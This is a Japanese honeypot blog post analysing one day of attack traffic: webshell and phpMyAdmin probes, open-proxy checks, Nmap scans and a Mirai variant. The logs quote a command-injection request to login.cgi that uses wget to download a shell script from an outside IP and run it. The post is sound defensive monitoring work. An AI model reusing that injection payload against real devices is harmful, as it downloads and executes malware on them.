S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/09/10)

ハニーポットのログ分析(2018/09/10)

honeypot

WOWhoneypotの2018/09/10(月) (運用97日目)の簡易分析です。
本日の総アクセス件数は 511件です。以下が全アクセスログです。

37 2018-09-10 GET /
8 2018-09-10 POST /qq.php
6 2018-09-10 POST /q.php
5 2018-09-10 POST /xx.php
5 2018-09-10 GET /shell.php
5 2018-09-10 GET /cmd.php
4 2018-09-10 POST /test.php
4 2018-09-10 POST /s.php
4 2018-09-10 GET /www/phpMyAdmin/index.php
4 2018-09-10 GET /tools/phpMyAdmin/index.php
4 2018-09-10 GET /phpMyAdmin/phpMyAdmin/index.php
4 2018-09-10 GET /claroline/phpMyAdmin/index.php
4 2018-09-10 GET /admin/phpMyAdmin/index.php
3 2018-09-10 PROPFIND /
3 2018-09-10 POST /zuoshou.php
3 2018-09-10 POST /zuo.php
3 2018-09-10 POST /yao.php
3 2018-09-10 POST /xw1.php
3 2018-09-10 POST /xshell.php
3 2018-09-10 POST /xiao.php
3 2018-09-10 POST /wshell.php
3 2018-09-10 POST /w.php
3 2018-09-10 POST /wp-admins.php
3 2018-09-10 POST /weixiao.php
3 2018-09-10 POST /webslee.php
3 2018-09-10 POST /wc.php
3 2018-09-10 POST /system.php
3 2018-09-10 POST /phpStudy.php
3 2018-09-10 POST /phpstudy.php
3 2018-09-10 POST /mz.php
3 2018-09-10 POST /mx.php
3 2018-09-10 POST /m.php?pbid=open
3 2018-09-10 POST /lindex.php
3 2018-09-10 POST /l8.php
3 2018-09-10 POST /l7.php
3 2018-09-10 POST /hm.php
3 2018-09-10 POST /feixiang.php
3 2018-09-10 POST /defect.php
3 2018-09-10 POST /db_session.init.php
3 2018-09-10 POST /db.init.php
3 2018-09-10 POST /db_desql.php
3 2018-09-10 POST /db_dataml.php
3 2018-09-10 POST /conflg.php
3 2018-09-10 POST /cmd.php
3 2018-09-10 POST /cainiao.php
3 2018-09-10 POST /aotu.php
3 2018-09-10 POST /ak47.php
3 2018-09-10 POST /9678.php
3 2018-09-10 POST /56.php
3 2018-09-10 GET /z.php
3 2018-09-10 GET /x.php
3 2018-09-10 GET /xampp/phpmyadmin/index.php
3 2018-09-10 GET /wpo.php
3 2018-09-10 GET /wp-config.php
3 2018-09-10 GET /web/phpMyAdmin/index.php
3 2018-09-10 GET /webdav/
3 2018-09-10 GET /uploader.php
3 2018-09-10 GET /test.php
3 2018-09-10 GET /pmd_online.php
3 2018-09-10 GET /pmd/index.php
3 2018-09-10 GET /pma-old/index.php
3 2018-09-10 GET /pmamy/index.php
3 2018-09-10 GET /pmamy2/index.php
3 2018-09-10 GET /PMA/index.php
3 2018-09-10 GET /pma/index.php
3 2018-09-10 GET /PMA2/index.php
3 2018-09-10 GET /phpmyadmin/phpmyadmin/index.php
3 2018-09-10 GET /phpMyAdminold/index.php
3 2018-09-10 GET /phpmyadmin-old/index.php
3 2018-09-10 GET /phpMyAdmin/index.php
3 2018-09-10 GET /phpmyadmin/index.php
3 2018-09-10 GET /phpMyadmin_bak/index.php
3 2018-09-10 GET /phpmyadmin2/index.php
3 2018-09-10 GET /phpmyadmin1/index.php
3 2018-09-10 GET /phpmyadmin0/index.php
3 2018-09-10 GET /phpma/index.php
3 2018-09-10 GET /mysqladmin/index.php
3 2018-09-10 GET /mysql-admin/index.php
3 2018-09-10 GET /myadmin2/index.php
3 2018-09-10 GET /muhstiks.php
3 2018-09-10 GET /muhstik2.php
3 2018-09-10 GET /lol.php
3 2018-09-10 GET /log.php
3 2018-09-10 GET /license.php
3 2018-09-10 GET /lala.php
3 2018-09-10 GET /lala-dpr.php
3 2018-09-10 GET /knal.php
3 2018-09-10 GET /index.php
3 2018-09-10 GET /help.php
3 2018-09-10 GET /help-e.php
3 2018-09-10 GET /desktop.ini.php
3 2018-09-10 GET /db_pma.php
3 2018-09-10 GET /db/index.php
3 2018-09-10 GET /db_cts.php
3 2018-09-10 GET /dbadmin/index.php
3 2018-09-10 GET /cmv.php
3 2018-09-10 GET /cmdd.php
3 2018-09-10 GET /appserv.php
3 2018-09-10 GET /admin/PMA/index.php
3 2018-09-10 GET /admin/pma/index.php
3 2018-09-10 GET /admin/mysql/index.php
3 2018-09-10 GET /admin/mysql2/index.php
3 2018-09-10 GET /admin/index.php
2 2018-09-10 POST /zuoindex.php
2 2018-09-10 POST /zshmindex.php
2 2018-09-10 POST /yumo.php
2 2018-09-10 POST /xz.php
2 2018-09-10 POST /xw.php
2 2018-09-10 POST /xiaoma.php
2 2018-09-10 POST /xiaomae.php
2 2018-09-10 POST /wuwu11.php
2 2018-09-10 POST /wcp.php
2 2018-09-10 POST /wan.php
2 2018-09-10 POST /wanan.php
2 2018-09-10 POST /tiandi.php
2 2018-09-10 POST /ss.php
2 2018-09-10 POST /ssaa.php
2 2018-09-10 POST /she.php
2 2018-09-10 POST /sheep.php
2 2018-09-10 POST /sean.php
2 2018-09-10 POST /qw.php
2 2018-09-10 POST /qwe.php
2 2018-09-10 POST /qaq.php
2 2018-09-10 POST /python.php
2 2018-09-10 POST /phpinfi.php
2 2018-09-10 POST /pe.php
2 2018-09-10 POST /min.php
2 2018-09-10 POST /miao.php
2 2018-09-10 POST /log.php
2 2018-09-10 POST /linuxse.php
2 2018-09-10 POST /l6.php
2 2018-09-10 POST /ip.php
2 2018-09-10 POST /infoo.php
2 2018-09-10 POST /hh.php
2 2018-09-10 POST /help.php
2 2018-09-10 POST /h1.php
2 2018-09-10 POST /fack.php
2 2018-09-10 POST /db__.init.php
2 2018-09-10 POST /data.php
2 2018-09-10 POST /ceshi.php
2 2018-09-10 POST /caonma.php
2 2018-09-10 POST /boots.php
2 2018-09-10 POST /bak.php
2 2018-09-10 POST /aw.php
2 2018-09-10 POST /app.php
2 2018-09-10 POST /angge.php
2 2018-09-10 POST /ak.php
2 2018-09-10 POST /ak48.php
2 2018-09-10 POST /aaaa.php
2 2018-09-10 POST /9510.php
2 2018-09-10 POST /3.php
2 2018-09-10 POST /12.php
2 2018-09-10 POST /1213.php
2 2018-09-10 GET /typo3/phpmyadmin/index.php
2 2018-09-10 GET /text.php
2 2018-09-10 GET /_query.php
2 2018-09-10 GET /phpadmin/index.php
2 2018-09-10 GET /mysql/index.php
2 2018-09-10 GET /myadmin/index.php
2 2018-09-10 GET /muhstik.php
2 2018-09-10 GET /muhstik-dpr.php
2 2018-09-10 GET /logon.php
2 2018-09-10 GET /java.php
2 2018-09-10 GET /hell.php
2 2018-09-10 GET /cmx.php
2 2018-09-10 GET /admin/phpmyadmin/index.php
2 2018-09-10 GET /admin/phpmyadmin2/index.php
2 2018-09-10 CONNECT www.baidu.com
1 2018-09-10 POST /xiaomar.php
1 2018-09-10 POST /sdk
1 2018-09-10 POST /post.php
1 2018-09-10 POST /default.php
1 2018-09-10 HEAD /
1 2018-09-10 GET /upload/bank-icons/bank-gh.jpg
1 2018-09-10 GET /upload/bank-icons/bank_16.png
1 2018-09-10 GET /robots.txt
1 2018-09-10 GET /phpMyAdmin.old/index.php
1 2018-09-10 GET /NmapUpperCheck1536525130
1 2018-09-10 GET /nmaplowercheck1536525130
1 2018-09-10 GET /Nmap/folder/check1536525130
1 2018-09-10 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-09-10 GET hxxp://112.35.88.28:10083/index.php
1 2018-09-10 GET hxxp://112.35.63.31:10083/index.php
1 2018-09-10 GET /HNAP1
1 2018-09-10 GET /evox/about

phpMyAdmin関連(132件)とphpのWebShell設置の調査(455件)と/へのアクセスを除外したアクセス数です。

3 2018-09-10 GET /webdav/
2 2018-09-10 CONNECT www.baidu.com
1 2018-09-10 GET hxxp://112.35.88.28:10083/index.php
1 2018-09-10 GET hxxp://112.35.63.31:10083/index.php
1 2018-09-10 POST /sdk
1 2018-09-10 GET /NmapUpperCheck1536525130
1 2018-09-10 GET /nmaplowercheck1536525130
1 2018-09-10 GET /Nmap/folder/check1536525130
1 2018-09-10 GET /HNAP1
1 2018-09-10 GET /evox/about 
1 2018-09-10 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-09-10 GET /upload/bank-icons/bank-gh.jpg
1 2018-09-10 GET /upload/bank-icons/bank_16.png
1 2018-09-10 GET /robots.txt

 以下はWebサーバの設定不備を狙った不正中継の調査攻撃です。

2 2018-09-10 CONNECT www.baidu[.]com
1 2018-09-10 GET hxxp://112.35.88[.]28:10083/index.php
1 2018-09-10 GET hxxp://112.35.63[.]31:10083/index.php

以下は同一のIPから来ています。NMAPのスクリプトによるスキャンと思われます。

1 2018-09-10 GET /NmapUpperCheck1536525130
1 2018-09-10 GET /nmaplowercheck1536525130
1 2018-09-10 GET /Nmap/folder/check1536525130
1 2018-09-10 POST /sdk
1 2018-09-10 GET /HNAP1
1 2018-09-10 GET /evox/about 

本日のMirai亜種は「User-Agent: Hakai/2.0」でした。

以下は以前も来ていましたが、何を目的とした調査なのかは不明です。

GET /upload/bank-icons/bank-gh.jpg HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://[ipaddr]:80/upload/bank-icons/bank-gh.jpg
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Connection: Keep-Alive
Cache-Control: no-cache

GET /upload/bank-icons/bank_16.png HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://@ipaddr]:80/upload/bank-icons/bank_16.png
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Connection: Keep-Alive
Cache-Control: no-cache

 

本日のドメインでのアクセスは以下です。

3 GET /
1 GET /robots.txt

本日のハンティングログは以下です。

1 2018-09-10 wget hxxp://77.87.77.250/izuku.sh

以上です。